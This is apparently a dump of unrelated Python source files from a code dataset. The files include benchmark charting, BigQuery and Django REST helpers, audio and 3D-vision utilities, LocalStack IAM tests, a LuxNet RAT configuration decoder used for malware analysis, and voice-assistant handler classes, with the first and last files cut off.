benchmarks = benchmarks.filter(filter)
if timeline:
# XXX: sort the values
# XXX: check that the CPU is always the same
chart = TimelineChart(title)
else:
chart = GroupedBarChart(title)
#
for b in benchmarks:
b.__displayed__ = True
series_name = series(b)
group_name = group(b)
chart.add(series_name, group_name, b)
chart = chart.build()
if self.latest_warning and not timeline:
chart.x_title = self.latest_warning
return chart
def run_directive(self, title, options, content):
namespace = {'charter': self}
if content:
src = py.code.Source('\n'.join(content))
exec src.compile() in namespace
#
def get_function(name):
src = 'lambda b: ' + options.get(name, 'None')
return eval(src, namespace)
#
timeline = 'timeline' in options
benchmarks = self.all if timeline else self.latest
#
# split the benchmarks into various group by using the foreach key
foreach = get_function('foreach')
d = defaultdict(PyQuery)
for b in benchmarks:
key = foreach(b)
d[key].append(b)
#
# generate a chart for each "foreach" group
res = []
for key in sorted(d):
benchmarks = d[key]
newtitle = title
if key:
newtitle += ' [%s]' % key
chart = self.get_chart(
timeline = timeline,
benchmarks = benchmarks,
title = newtitle,
filter = get_function('filter'),
series = get_function('series'),
group = get_function('group'))
res.append(chart)
return res
|
1708488
|
import logging
from src.commons.big_query.big_query_table_metadata import BigQueryTableMetadata
class SLIBackupTableNotSeenByCensusPredicate(object):
def __init__(self, big_query, query_specification):
self.big_query = big_query
self.query_specification = query_specification
def is_not_seen_by_census(self, sli_table):
backup_table_reference = self.query_specification.to_backup_table_reference(sli_table)
backup_table_metadata = BigQueryTableMetadata(
self.big_query.get_table(
project_id=backup_table_reference.project_id,
dataset_id=backup_table_reference.dataset_id,
table_id=backup_table_reference.table_id)
)
if not backup_table_metadata.table_exists():
logging.info("Backup table doesn't exist: %s",
backup_table_reference)
return False
if not sli_table['backupLastModifiedTime']:
if backup_table_metadata.table_size_in_bytes() == sli_table['backupEntityNumBytes']:
logging.info(
"Backup table: %s exists although Census doesn't see it yet. "
"Backup table have the same number of bytes as saved in datastore.",
backup_table_reference)
return True
return False
|
1708503
|
import sys
class MuninGraph(object):
def run(self):
cmd_name = None
if len(sys.argv) > 1:
cmd_name = sys.argv[1]
if cmd_name == 'config':
self.print_config()
else:
metrics = self.calculate_metrics()
self.print_metrics(metrics)
def print_config(self):
for key,value in self.graph_config.items():
print('%s %s' % (key, value))
def print_metrics(self, metrics):
for key, value in metrics.items():
print('%s.value %s' % (key, value))
|
1708504
|
from .folder import ImageFolder, DatasetFolder
from .vision import VisionDataset
__all__ = ('ImageFolder', 'DatasetFolder', 'VisionDataset')
|
1708527
|
import rest_framework_filters as filters
from metaci.build.models import Build
from metaci.build.models import BuildFlow
from metaci.build.models import Rebuild
from metaci.cumulusci.filters import OrgRelatedFilter
from metaci.cumulusci.filters import ScratchOrgInstanceRelatedFilter
from metaci.cumulusci.models import Org
from metaci.cumulusci.models import ScratchOrgInstance
from metaci.plan.filters import PlanRelatedFilter
from metaci.plan.models import Plan
from metaci.repository.filters import BranchRelatedFilter
from metaci.repository.filters import RepositoryRelatedFilter
from metaci.repository.models import Branch
from metaci.repository.models import Repository
class BuildRelatedFilter(filters.FilterSet):
branch = filters.RelatedFilter(
BranchRelatedFilter,
field_name='branch',
queryset=Branch.objects.all()
)
org = filters.RelatedFilter(
OrgRelatedFilter,
field_name='org',
queryset=Org.objects.all()
)
plan = filters.RelatedFilter(
PlanRelatedFilter,
field_name='plan',
queryset=Plan.objects.all()
)
repo = filters.RelatedFilter(
RepositoryRelatedFilter,
field_name='repo',
queryset=Repository.objects.all()
)
class Meta:
model = Build
fields = {
'commit': ['exact'],
'status': ['exact'],
'time_queue': ['gt','lt'],
'time_start': ['gt','lt'],
'time_end': ['gt','lt'],
}
class BuildFilter(BuildRelatedFilter):
pass
class RebuildRelatedFilter(filters.FilterSet):
build = filters.RelatedFilter(
BuildRelatedFilter,
name='build',
queryset=Build.objects.all()
)
class Meta:
model = Rebuild
fields = {
'status': ['exact'],
'time_queue': ['gt','lt'],
'time_start': ['gt','lt'],
'time_end': ['gt','lt'],
}
class RebuildFilter(RebuildRelatedFilter):
pass
class BuildFlowRelatedFilter(filters.FilterSet):
build = filters.RelatedFilter(
BuildRelatedFilter,
field_name='build',
queryset=Build.objects.all()
)
rebuild = filters.RelatedFilter(
RebuildRelatedFilter,
field_name='build',
queryset=Rebuild.objects.all()
)
class Meta:
model = BuildFlow
fields = {
'status': ['exact'],
'time_queue': ['gt','lt'],
'time_start': ['gt','lt'],
'time_end': ['gt','lt'],
}
class BuildFlowFilter(BuildFlowRelatedFilter):
pass
|
1708533
|
import quiver
import torch
world_size = torch.cuda.device_count()
device_list = list(range(world_size))
numa_topo = quiver.NumaTopo(device_list)
numa_topo.info()
|
1708545
|
import argparse
import os
import librosa
from utils.utils import calc_snr, calc_lsd
from generating import AudioGenerator
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--input_folder', help='Folder of trained model', type=str, required=True)
parser.add_argument('--lr_signal', help='Name of signal to perform bandwidth extension on', type=str, required=True)
parser.add_argument('--filter_file',
help='Text file describing the anti-aliasing filter frequency response used for downsampling',
type=str, default=None)
args = parser.parse_args()
file_name = args.lr_signal.split('.')
audio_generator = AudioGenerator(os.path.join('outputs', args.input_folder))
if len(file_name) < 2:
args.lr_signal = '.'.join([args.lr_signal, 'wav'])
lr_signal, condition_fs = librosa.load(os.path.join('inputs', args.lr_signal), sr=None)
norm_factor = abs(lr_signal).max()
lr_signal = lr_signal / norm_factor
condition = {'condition_signal': lr_signal, 'condition_fs': condition_fs, 'name': args.lr_signal.split('.')[0]}
filter_file = None if args.filter_file is None else os.path.join('inputs', args.filter_file + '.txt')
extended_signal = audio_generator.extend(condition, filter_file)
# If high-resolution signal exist, use it to calculate snr and lsd of extended signal
if os.path.exists(os.path.join('inputs', args.lr_signal.replace('_lr', '_hr'))):
hr_signal, hr_fs = librosa.load(os.path.join('inputs', args.lr_signal.replace('_lr', '_hr')),
sr=audio_generator.params.Fs)
# The model is working on normalized signals, so we normalize the ground truth as well for snr calculation,
# You may instead multiply extended_signal by norm_factor, in order to return to the original amplitudes.
hr_signal = hr_signal / norm_factor
snr = calc_snr(extended_signal, hr_signal)
lsd = calc_lsd(extended_signal, hr_signal)
print('SNR: %.2f[dB], LSD: %.2f\n' % (snr, lsd))
|
1708557
|
from os import mkdir
from shutil import copy2, rmtree
from os.path import basename, join
from json import load, dumps
from file_handler import read_data
from generator import get_dim
def start(event_name, template, csv):
try:
mkdir("UI/temp")
except:
pass
for x in [(template, basename(template)), (csv, basename(csv))]:
try:
copy2(x[0], join("UI/temp", x[1]))
except:
pass
with open(join("UI/temp", "dsc-cert-gen.json"), "w") as f:
f.write(dumps({"event_name": event_name, "template": join("temp", basename(template)), "csv": join("UI/temp", basename(csv))}))
def saveEditor(trans):
with open(join("UI/temp", "dsc-cert-gen.json")) as f:
j = load(f)
j["data"] = trans
with open(join("UI/temp", "dsc-cert-gen.json"), "w") as f:
f.write(dumps(j))
def loadEditor():
with open(join("UI/temp", "dsc-cert-gen.json")) as f:
j = load(f)
j["width"], j["height"] = get_dim(join("UI", j["template"]))
j["template_base"] = basename(j["template"])
j["csv_base"] = basename(j["csv"])
return j
def loadOptions():
with open(join("UI/temp", "dsc-cert-gen.json")) as f:
j = load(f)
event_name = j["event_name"]
cols = read_data(j["csv"], only_cols=True)
html = ""
for i, j in enumerate(cols):
html += '<option value="{}">{}</option>'.format(i, j)
return [event_name, html]
def cleanup():
rmtree("UI/temp")
|
1708563
|
import jinja2
from localstack.utils.common import short_uid
from localstack.utils.generic.wait_utils import wait_until
from tests.integration.cloudformation.test_cloudformation_changesets import load_template_raw
def test_delete_role_detaches_role_policy(
cfn_client,
iam_client,
cleanup_stacks,
cleanup_changesets,
is_change_set_created_and_available,
is_stack_created,
):
stack_name = f"stack-{short_uid()}"
change_set_name = f"change-set-{short_uid()}"
role_name = f"LsRole{short_uid()}"
policy_name = f"LsPolicy{short_uid()}"
template_rendered = jinja2.Template(load_template_raw("iam_role_policy.yaml")).render(
role_name=role_name,
policy_name=policy_name,
include_policy=True,
)
response = cfn_client.create_change_set(
StackName=stack_name,
ChangeSetName=change_set_name,
TemplateBody=template_rendered,
ChangeSetType="CREATE",
)
change_set_id = response["Id"]
stack_id = response["StackId"]
try:
wait_until(is_change_set_created_and_available(change_set_id))
cfn_client.execute_change_set(ChangeSetName=change_set_id)
wait_until(is_stack_created(stack_id))
attached_policies = iam_client.list_attached_role_policies(RoleName=role_name)[
"AttachedPolicies"
]
assert len(attached_policies) > 0
# nopolicy_template = jinja2.Template(load_template_raw("iam_role_policy.yaml")).render(
# role_name=role_name,
# policy_name=policy_name,
# include_policy=False,
# )
# nopolicy_changeset_name = f"change-set-{short_uid()}"
# response = cfn_client.create_change_set(
# StackName=stack_name,
# ChangeSetName=nopolicy_changeset_name,
# TemplateBody=nopolicy_template,
# ChangeSetType="UPDATE",
# )
# change_set_id = response["Id"]
# wait_until(is_change_set_created_and_available(change_set_id))
# cfn_client.execute_change_set(ChangeSetName=change_set_id)
# time.sleep(5)
# wait_until(is_stack_created(stack_id)) # TODO: wrong format
# wait_until(is_stack_deleted(stack_id))
# TODO: need to update stack to delete only a single resource
# attached_policies = iam_client.list_attached_role_policies(RoleName=role_name)['AttachedPolicies']
# assert len(attached_policies) == 0
finally:
cleanup_changesets([change_set_id])
cleanup_stacks([stack_id])
def test_policy_attachments(
cfn_client,
iam_client,
cleanup_stacks,
cleanup_changesets,
is_change_set_created_and_available,
is_stack_created,
):
stack_name = f"stack-{short_uid()}"
change_set_name = f"change-set-{short_uid()}"
role_name = f"role-{short_uid()}"
group_name = f"group-{short_uid()}"
user_name = f"user-{short_uid()}"
policy_name = f"policy-{short_uid()}"
template_rendered = jinja2.Template(load_template_raw("iam_policy_attachments.yaml")).render(
role_name=role_name,
policy_name=policy_name,
user_name=user_name,
group_name=group_name,
)
response = cfn_client.create_change_set(
StackName=stack_name,
ChangeSetName=change_set_name,
TemplateBody=template_rendered,
ChangeSetType="CREATE",
)
change_set_id = response["Id"]
stack_id = response["StackId"]
try:
wait_until(is_change_set_created_and_available(change_set_id))
cfn_client.execute_change_set(ChangeSetName=change_set_id)
wait_until(is_stack_created(stack_id))
# check inline policies
role_inline_policies = iam_client.list_role_policies(RoleName=role_name)
user_inline_policies = iam_client.list_user_policies(UserName=user_name)
group_inline_policies = iam_client.list_group_policies(GroupName=group_name)
assert len(role_inline_policies["PolicyNames"]) == 1
assert len(user_inline_policies["PolicyNames"]) == 1
assert len(group_inline_policies["PolicyNames"]) == 1
# check managed/attached policies
role_attached_policies = iam_client.list_attached_role_policies(RoleName=role_name)
user_attached_policies = iam_client.list_attached_user_policies(UserName=user_name)
group_attached_policies = iam_client.list_attached_group_policies(GroupName=group_name)
assert len(role_attached_policies["AttachedPolicies"]) == 1
assert len(user_attached_policies["AttachedPolicies"]) == 1
assert len(group_attached_policies["AttachedPolicies"]) == 1
finally:
cleanup_changesets([change_set_id])
cleanup_stacks([stack_id])
|
1708599
|
from malwareconfig.common import Decoder
from malwareconfig.common import string_printable
class LuxNet(Decoder):
decoder_name = "LuxNet"
decoder__version = 1
decoder_author = "@kevthehermit"
decoder_description = "Luxnet RAT Decoder"
def __init__(self):
self.config = {}
def get_config(self):
'''
This is the main entry
:return:
'''
config_dict = {}
user_strings = self.file_info.dotnet_user_strings()
base_location = user_strings.index("SocketException")
config_dict['domain'] = user_strings[base_location-2]
config_dict['port'] = user_strings[base_location-1]
# Set the config to the class for use
self.config = config_dict
|
1708617
|
import numpy as np
class NetworkInput(object):
def __init__(self, path, input_shape, num_labels):
self.path = path
self.num_labels = num_labels
self.batch_start = 0
self.epochs_completed = 0
self.input_shape = input_shape
self.cache = np.array([])
self.cache_iterator = 0
self.cache_factor = 10
def next_batch(self, batch_size):
raise NotImplemented
def create_label_vector(self, label):
v = np.zeros(self.num_labels)
v[label] = 1
return v
def next_batch_cached(self, batch_size):
if self.cache_iterator == 0:
self.cache = self.next_batch(batch_size * self.cache_factor)
result_images = self.cache[0][self.cache_iterator * batch_size : (self.cache_iterator+1) * batch_size]
result_labels = self.cache[1][self.cache_iterator * batch_size : (self.cache_iterator+1) * batch_size]
self.cache_iterator = (self.cache_iterator + 1) % self.cache_factor
return result_images, result_labels
|
1708670
|
from torchvision.transforms.functional import InterpolationMode
import os
from PIL import Image
import numpy as np
from collections import OrderedDict
from tqdm.auto import tqdm
import torchvision
import torch
def to_numpy(x):
x_ = np.array(x)
x_ = x_.astype(np.float32)
return x_
def get_image_transform(transform):
# fix for this issue: https://github.com/pytorch/vision/issues/2194
if transform is not None and isinstance(transform, torchvision.transforms.Compose) and (transform.transforms[-1], torchvision.transforms.ToTensor):
transform = torchvision.transforms.Compose([
*transform.transforms[:-1],
torchvision.transforms.Lambda(to_numpy),
torchvision.transforms.ToTensor()
])
elif isinstance(transform, torchvision.transforms.ToTensor):
transform = torchvision.transforms.Compose([
torchvision.transforms.Lambda(to_numpy),
torchvision.transforms.ToTensor()
])
return transform
def unproject(cam2world, intrinsic, depth):
# get dimensions
bs, _, H, W = depth.shape
# create meshgrid with image dimensions (== pixel coordinates of source image)
y = torch.linspace(0, H - 1, H).type_as(depth).int()
x = torch.linspace(0, W - 1, W).type_as(depth).int()
xx, yy = torch.meshgrid(x, y)
xx = torch.transpose(xx, 0, 1).repeat(bs, 1, 1)
yy = torch.transpose(yy, 0, 1).repeat(bs, 1, 1)
# get intrinsics and depth in correct format to match image dimensions
fx = intrinsic[:, 0, 0].unsqueeze(1).unsqueeze(1).expand_as(xx)
cx = intrinsic[:, 0, 2].unsqueeze(1).unsqueeze(1).expand_as(xx)
fy = intrinsic[:, 1, 1].unsqueeze(1).unsqueeze(1).expand_as(yy)
cy = intrinsic[:, 1, 2].unsqueeze(1).unsqueeze(1).expand_as(yy)
depth = depth.squeeze()
# inverse projection (K_inv) on pixel coordinates --> 3D point-cloud
x = (xx - cx) / fx * depth
y = (yy - cy) / fy * depth
# combine each point into an (x,y,z,1) vector
coords = torch.zeros(bs, H, W, 4).type_as(depth).float()
coords[:, :, :, 0] = x
coords[:, :, :, 1] = y
coords[:, :, :, 2] = depth
coords[:, :, :, 3] = 1
# extrinsic view projection to target view
coords = coords.view(bs, -1, 4)
coords = torch.bmm(coords, cam2world)
coords = coords.view(bs, H, W, 4)
return coords
def reproject(cam2world_src, cam2world_tar, W, H, intrinsic, depth_src, depth_tar, color_tar, mask_tar):
# get batch_size
bs = mask_tar.shape[0]
# calculate src2tar extrinsic matrix
world2cam_tar = torch.inverse(cam2world_tar)
src2tar = torch.transpose(torch.bmm(world2cam_tar, cam2world_src), 1, 2)
# create meshgrid with image dimensions (== pixel coordinates of source image)
y = torch.linspace(0, H - 1, H).type_as(color_tar).int()
x = torch.linspace(0, W - 1, W).type_as(color_tar).int()
xx, yy = torch.meshgrid(x, y)
xx = torch.transpose(xx, 0, 1).repeat(bs, 1, 1)
yy = torch.transpose(yy, 0, 1).repeat(bs, 1, 1)
# get intrinsics and depth in correct format to match image dimensions
fx = intrinsic[:,0,0].unsqueeze(1).unsqueeze(1).expand_as(xx)
cx = intrinsic[:,0,2].unsqueeze(1).unsqueeze(1).expand_as(xx)
fy = intrinsic[:,1,1].unsqueeze(1).unsqueeze(1).expand_as(yy)
cy = intrinsic[:,1,2].unsqueeze(1).unsqueeze(1).expand_as(yy)
depth_src = depth_src.squeeze()
# inverse projection (K_inv) on pixel coordinates --> 3D point-cloud
x = (xx - cx) / fx * depth_src
y = (yy - cy) / fy * depth_src
# combine each point into an (x,y,z,1) vector
coords = torch.zeros(bs, H, W, 4).type_as(color_tar).float()
coords[:, :, :, 0] = x
coords[:, :, :, 1] = y
coords[:, :, :, 2] = depth_src
coords[:, :, :, 3] = 1
# extrinsic view projection to target view
coords = coords.view(bs, -1, 4)
coords = torch.bmm(coords, src2tar)
coords = coords.view(bs, H, W, 4)
# projection (K) on 3D point-cloud --> pixel coordinates
z_tar = coords[:, :, :, 2]
x = coords[:, :, :, 0] / (1e-8 + z_tar) * fx + cx
y = coords[:, :, :, 1] / (1e-8 + z_tar) * fy + cy
# mask invalid pixel coordinates because of invalid source depth
mask0 = (depth_src == 0)
# mask invalid pixel coordinates after projection:
# these coordinates are not visible in target view (out of screen bounds)
mask1 = (x < 0) + (y < 0) + (x >= W - 1) + (y >= H - 1)
# create 4 target pixel coordinates which map to the nearest integer coordinate
# (left, top, right, bottom)
lx = torch.floor(x).float()
ly = torch.floor(y).float()
rx = (lx + 1).float()
ry = (ly + 1).float()
def make_grid(x, y):
"""
converts pixel coordinates from [0..W] or [0..H] to [-1..1] and stacks them together.
:param x: x pixel coordinates with shape NxHxW
:param y: y pixel coordinates with shape NxHxW
:return: (x,y) pixel coordinate grid with shape NxHxWx2
"""
x = (2.0 * x / W) - 1.0
y = (2.0 * y / H) - 1.0
grid = torch.stack((x, y), dim=3)
return grid
# combine to (x,y) pixel coordinates: (top-left, ..., bottom-right)
ll = make_grid(lx, ly)
lr = make_grid(lx, ry)
rl = make_grid(rx, ly)
rr = make_grid(rx, ry)
# calculate difference between depth in target view after reprojection and gt depth in target view
z_tar = z_tar.unsqueeze(1)
sample_z1 = torch.abs(z_tar - torch.nn.functional.grid_sample(depth_tar, ll,
mode="nearest",
padding_mode='border',
align_corners=True))
sample_z2 = torch.abs(z_tar - torch.nn.functional.grid_sample(depth_tar, lr,
mode="nearest",
padding_mode='border',
align_corners=True))
sample_z3 = torch.abs(z_tar - torch.nn.functional.grid_sample(depth_tar, rl,
mode="nearest",
padding_mode='border',
align_corners=True))
sample_z4 = torch.abs(z_tar - torch.nn.functional.grid_sample(depth_tar, rr,
mode="nearest",
padding_mode='border',
align_corners=True))
# mask invalid pixel coordinates because of too high difference in depth
mask2 = torch.minimum(torch.minimum(sample_z1, sample_z2), torch.minimum(sample_z3, sample_z4)) > 0.1
mask2 = mask2.int().squeeze()
# combine all masks
mask_remap = (1 - (mask0 + mask1 + mask2 > 0).int()).float().unsqueeze(1)
# create (x,y) pixel coordinate grid with reprojected float coordinates
map_x = x.float()
map_y = y.float()
map = make_grid(map_x, map_y)
# warp target rgb/mask to the new pixel coordinates based on the reprojection
# also mask the results
color_tar_to_src = torch.nn.functional.grid_sample(color_tar, map,
mode="bilinear",
padding_mode='border',
align_corners=True)
mask_tar = mask_tar.float().unsqueeze(1)
mask = torch.nn.functional.grid_sample(mask_tar, map,
mode="bilinear",
padding_mode='border',
align_corners=True)
mask = (mask > 0.99) * mask_remap
mask = mask.bool()
color_tar_to_src *= mask
return color_tar_to_src, mask.squeeze(1)
|
1708677
|
import FWCore.ParameterSet.Config as cms
from RecoEcal.EgammaClusterProducers.hybridSuperClusters_cfi import *
from RecoEcal.EgammaClusterProducers.multi5x5BasicClusters_cfi import *
EleIsoEcalFromHitsExtractorBlock = cms.PSet(
ComponentName = cms.string('EgammaRecHitExtractor'),
DepositLabel = cms.untracked.string(''),
isolationVariable = cms.string('et'),
extRadius = cms.double(0.6),
intRadius = cms.double(0.0),
intStrip = cms.double(0.0),
etMin = cms.double(0.0),
energyMin = cms.double(0.095),
subtractSuperClusterEnergy = cms.bool(False),
tryBoth = cms.bool(True),
vetoClustered = cms.bool(False),
barrelEcalHits = cms.InputTag("ecalRecHit","EcalRecHitsEB"),
endcapEcalHits = cms.InputTag("ecalRecHit","EcalRecHitsEE"),
RecHitFlagToBeExcludedEB = cleanedHybridSuperClusters.RecHitFlagToBeExcluded,
RecHitSeverityToBeExcludedEB = cleanedHybridSuperClusters.RecHitSeverityToBeExcluded,
RecHitFlagToBeExcludedEE = multi5x5BasicClustersCleaned.RecHitFlagToBeExcluded,
RecHitSeverityToBeExcludedEE = cleanedHybridSuperClusters.RecHitSeverityToBeExcluded
#severityLevelCut = cms.int32(4),
# severityRecHitThreshold = cms.double(5.0),
# spikeIdString = cms.string('kSwissCrossBordersIncluded'),
# spikeIdThreshold = cms.double(0.95),
# recHitFlagsToBeExcluded = cms.vstring(
# 'kFaultyHardware',
# 'kPoorCalib',
# ecalRecHitFlag_kSaturated,
# ecalRecHitFlag_kLeadingEdgeRecovered,
# ecalRecHitFlag_kNeighboursRecovered,
# 'kTowerRecovered',
# 'kDead'
# ),
)
|
1708692
|
import os
import sys
import numpy as np
from .config import config
class Model:
def __init__(self, n_feature, n_tag):
self.n_tag = n_tag
self.n_feature = n_feature
self.n_transition_feature = n_tag * (n_feature + n_tag)
if config.random:
self.w = np.random.random(size=(self.n_transition_feature,)) * 2 - 1
else:
self.w = np.zeros(self.n_transition_feature)
def expand(self, n_feature, n_tag):
new_transition_feature = n_tag * (n_feature + n_tag)
if config.random:
new_w = np.random.random(size=(new_transition_feature,)) * 2 - 1
else:
new_w = np.zeros(new_transition_feature)
n_node = self.n_tag * self.n_feature
n_edge = self.n_tag * self.n_tag
new_w[:n_node] = self.w[:n_node]
new_w[-n_edge:] = self.w[-n_edge:]
self.n_tag = n_tag
self.n_feature = n_feature
self.n_transition_feature = new_transition_feature
self.w = new_w
def _get_node_tag_feature_id(self, feature_id, tag_id):
return feature_id * self.n_tag + tag_id
def _get_tag_tag_feature_id(self, pre_tag_id, tag_id):
return self.n_feature * self.n_tag + tag_id * self.n_tag + pre_tag_id
@classmethod
def load(cls, model_dir=None):
if model_dir is None:
model_dir = config.modelDir
model_path = os.path.join(model_dir, "weights.npz")
if os.path.exists(model_path):
npz = np.load(model_path)
sizes = npz["sizes"]
w = npz["w"]
model = cls.__new__(cls)
model.n_tag = int(sizes[0])
model.n_feature = int(sizes[1])
model.n_transition_feature = model.n_tag * (
model.n_feature + model.n_tag
)
model.w = w
assert model.w.shape[0] == model.n_transition_feature
return model
print(
"WARNING: weights.npz does not exist, try loading using old format",
file=sys.stderr,
)
model_path = os.path.join(model_dir, "model.txt")
with open(model_path, encoding="utf-8") as f:
ary = f.readlines()
model = cls.__new__(cls)
model.n_tag = int(ary[0].strip())
wsize = int(ary[1].strip())
w = np.zeros(wsize)
for i in range(2, wsize):
w[i - 2] = float(ary[i].strip())
model.w = w
model.n_feature = wsize // model.n_tag - model.n_tag
model.n_transition_feature = wsize
model.save(model_dir)
return model
@classmethod
def new(cls, model, copy_weight=True):
new_model = cls.__new__(cls)
new_model.n_tag = model.n_tag
if copy_weight:
new_model.w = model.w.copy()
else:
new_model.w = np.zeros_like(model.w)
new_model.n_feature = (
new_model.w.shape[0] // new_model.n_tag - new_model.n_tag
)
new_model.n_transition_feature = new_model.w.shape[0]
return new_model
def save(self, model_dir=None):
if model_dir is None:
model_dir = config.modelDir
sizes = np.array([self.n_tag, self.n_feature])
np.savez(
os.path.join(model_dir, "weights.npz"), sizes=sizes, w=self.w
)
# np.save
# with open(file, "w", encoding="utf-8") as f:
# f.write("{}\n{}\n".format(self.n_tag, self.w.shape[0]))
# for value in self.w:
# f.write("{:.4f}\n".format(value))
|
1708700
|
import unittest
import subprocess
class TestJupyterNbconvert(unittest.TestCase):
def test_nbconvert(self):
result = subprocess.run([
'jupyter',
'nbconvert',
'--to',
'notebook',
'--template',
'/opt/kaggle/nbconvert-extensions.tpl',
'--execute',
'--stdout',
'/input/tests/data/notebook.ipynb',
], stdout=subprocess.PIPE)
self.assertEqual(0, result.returncode)
self.assertTrue(b'999' in result.stdout)
|
1708709
|
def my_function(a, b):
return a + b
functions = [my_function]
print(functions[0])
print(functions[0](1, 2))
|
1708722
|
import unittest
from media_management_scripts.convert import convert_config_from_ns, convert_with_config, combine
from media_management_scripts.support.combine_all import combine_all, get_combinable_files
from tests import create_test_video, VideoDefinition, AudioDefition, AudioCodec, AudioChannelName
from tempfile import NamedTemporaryFile, TemporaryDirectory
from media_management_scripts.utils import extract_metadata, ConvertConfig
import os
SRT_TEXT = """
1
00:01:16,820 --> 00:01:19,660
This is the first piece.
2
00:01:19,740 --> 00:01:22,700
This is another piece.
"""
class CombineTestCase(unittest.TestCase):
def _validate_file(self, filename, lang='eng'):
metadata = extract_metadata(filename)
self.assertEqual(1, len(metadata.video_streams))
self.assertEqual(1, len(metadata.audio_streams))
self.assertEqual(1, len(metadata.subtitle_streams))
self.assertEqual(lang, metadata.subtitle_streams[0].language)
def test_basic_combine(self):
with create_test_video(length=3) as file, \
NamedTemporaryFile(suffix='.srt', mode='w') as srt_file, \
NamedTemporaryFile(suffix='.mkv') as out:
srt_file.file.write(SRT_TEXT)
srt_file.file.flush()
ret = combine(file.name, srt_file.name, output=out.name, lang='eng', overwrite=True)
self.assertEqual(0, ret)
self._validate_file(out.name)
def test_get_combinable_files(self):
with TemporaryDirectory() as input_dir, TemporaryDirectory() as output_dir:
file1 = os.path.join(input_dir, 'file1.mkv')
file2 = os.path.join(input_dir, 'file2.mkv')
file3 = os.path.join(input_dir, 'file3.mkv')
file1_srt = os.path.join(input_dir, 'file1.eng.srt')
file2_srt = os.path.join(input_dir, 'file2.spa.srt')
create_test_video(length=3, output_file=file1)
create_test_video(length=3, output_file=file2)
create_test_video(length=3, output_file=file3)
with open(file1_srt, 'w') as f:
f.write(SRT_TEXT)
with open(file2_srt, 'w') as f:
f.write(SRT_TEXT)
files = list(get_combinable_files(input_dir, output_dir))
self.assertEqual((file1, file1_srt, 'eng', os.path.join(output_dir, 'file1.mkv')), files[0])
self.assertEqual((file2, file2_srt, 'spa', os.path.join(output_dir, 'file2.mkv')), files[1])
self.assertEqual((file3, None, None, os.path.join(output_dir, 'file3.mkv')), files[2])
def test_combine_all(self):
with TemporaryDirectory() as input_dir, TemporaryDirectory() as output_dir:
create_test_video(length=3, output_file=os.path.join(input_dir, 'file1.mkv'))
create_test_video(length=3, output_file=os.path.join(input_dir, 'file2.mkv'))
create_test_video(length=3, output_file=os.path.join(input_dir, 'file3.mkv'))
with open(os.path.join(input_dir, 'file1.eng.srt'), 'w') as f:
f.write(SRT_TEXT)
with open(os.path.join(input_dir, 'file2.spa.srt'), 'w') as f:
f.write(SRT_TEXT)
combine_all(get_combinable_files(input_dir, output_dir))
out1 = os.path.join(output_dir, 'file1.mkv')
out2 = os.path.join(output_dir, 'file2.mkv')
self.assertTrue(os.path.isfile(out1))
self.assertTrue(os.path.isfile(out2))
self.assertFalse(os.path.isfile(os.path.join(output_dir, 'file3.mkv')))
self._validate_file(out1)
self._validate_file(out2, 'spa')
|
1708728
|
import os.path
from fabric.state import env
def run_capture(out = []):
"""Helper for retriving env.run issued commands"""
return lambda command, *args, **kwargs: out.append(command.strip())
class CdPlaceholder(object):
def __enter__(self, *args, **kwargs):
return True
def __exit__(self, type, value, traceback):
return False
def cd_capture(out = []):
def cd(command):
command = command.strip()
out.append('cd {}'.format(command))
return CdPlaceholder()
return cd
def empty_copy():
"""
A stub copy method that does nothing more then create a .txt file.
"""
source_path = os.path.join(env.current_release, "src")
env.run("mkdir -p %s" % source_path)
env.run("touch %s/app.txt" % source_path)
|
1708740
|
import json
import logging
from abc import abstractmethod
from json import dumps as json_dumps
from typing import List, Callable, Any, Optional
from inoft_vocal_framework.dummy_object import DummyObject
from inoft_vocal_framework.exceptions import raise_if_value_not_in_list, raise_if_variable_not_expected_type
from inoft_vocal_framework.platforms_handlers.endpoints_providers.providers import LambdaResponseWrapper
from inoft_vocal_framework.platforms_handlers.handler_input import HandlerInput, HandlerInputWrapper
from inoft_vocal_framework.plugins.loader import plugins_load
# todo: Add a prod and dev production mode, so that optisionnal status (like loading of plugins) is done only in developpement
# todo: Add a class with only a CanHandle function (for cases like the Yes and No classical handlers=
from inoft_vocal_framework.skill_settings.skill_settings import Settings
def canProcessIntentNames(intents_names: List[str]):
print(intents_names)
# todo: finish the canProcessIntentNames
def decorator(class_instance: Any):
"""def wrapper(*args, **kwargs):
return None
wrapper()"""
try:
class_instance_bases = class_instance.__bases__
if InoftStateHandler in class_instance_bases:
print("should add state handler to skill switch")
elif InoftRequestHandler in class_instance_bases:
print("should add request handler to skill switch")
# return wrapper
except Exception as e:
print(e)
finally:
return class_instance
return decorator
class InoftCondition(HandlerInputWrapper):
@abstractmethod
def can_handle(self) -> bool:
""" Returns true if Request Handler can handle the Request inside Handler Input.
:return: Boolean value that tells the dispatcher if the current request can be handled by this handler.
:rtype: bool
"""
raise NotImplementedError
class InoftHandler(HandlerInputWrapper):
@abstractmethod
def handle(self) -> dict:
"""Handles the Request inside handler input and provides a Response for dispatcher to return.
:return: Response for the dispatcher to return or None
:rtype: Union[Response, None]
"""
raise NotImplementedError
@abstractmethod
def handle_resume(self) -> dict:
# todo: make the handle resume function functionnal for the handler (cannot use a chain, but need to
# use a class path, that will be saved in the database)
print(f"Resuming an user session, but no logic has been found in the handle_resume function, defaulting to the handle function")
class InoftRequestHandler(HandlerInputWrapper):
@abstractmethod
def can_handle(self) -> bool:
""" Returns true if Request Handler can handle the Request inside Handler Input.
:return: Boolean value that tells the dispatcher if the current request can be handled by this handler.
:rtype: bool
"""
raise NotImplementedError
@abstractmethod
def handle(self) -> dict:
"""Handles the Request inside handler input and provides a Response for dispatcher to return.
:return: Response for the dispatcher to return or None
:rtype: Union[Response, None]
"""
raise NotImplementedError
@abstractmethod
def handle_resume(self) -> dict:
print(f"Resuming an user session, but no logic has been found in the handle_resume function, defaulting to the handle function")
class InoftStateHandler(HandlerInputWrapper):
# todo: make it possible for a state or request handler to be a nested class inside another one
@abstractmethod
def handle(self) -> dict:
"""Handles the Request inside handler input and provides a Response for dispatcher to return.
:return: Response for the dispatcher to return or None
:rtype: Union[Response, None]
"""
raise NotImplementedError
@abstractmethod
def fallback(self) -> dict:
""" Handler if no response has been gotten from the handle method.
:return: Response for the dispatcher to return or None
:rtype: Union[Response, None]
"""
return self.handle()
@abstractmethod
def handle_resume(self):
print(f"Resuming an user session, but no logic has been found in the handle_resume function, defaulting to the handle function")
class InoftDefaultFallback(HandlerInputWrapper):
@abstractmethod
def handle(self) -> dict:
